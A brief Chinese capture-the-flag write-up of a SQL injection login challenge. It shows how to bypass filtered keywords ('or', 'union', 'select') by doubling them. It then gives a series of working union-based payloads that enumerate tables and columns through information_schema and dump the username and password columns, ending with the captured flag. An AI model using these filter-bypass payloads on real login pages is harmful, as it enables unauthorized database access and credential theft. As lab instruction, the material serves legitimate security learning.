打开之后,尝试登录注入没啥用,发现or被过滤了,联合查询,union select 也被过滤了。
?username=1' uniunionon selselectect 1,2,3%23 &password=123
双写被过滤的关键字注入查询
然后直接爆数据库,发现被过滤了很多关键字,直接双写
?username=1' uniunionon selselectect 1,2,group_concat(table_name)frofromm infoorrmation_schema.tables whwhereere table_schema=database() %23 &password=123
因为是做完写的wp,所以flag是在 b4sql 这个数据的,然后直接爆表名
?username=1' uniunionon selselectect 1,2,group_concat(column_name)frofromm infoorrmation_schema.columns whwhereere table_name='b4bsql'%23 &password=123
爆数据
?username=1' uniunionon selselectect 1,2,group_concat(0x5c,username,0x5c,passwoorrd)frofromm b4bsql%23 &password=123
flag{94233c38-6dcf-42ef-bbd7-d3a3c76978f8}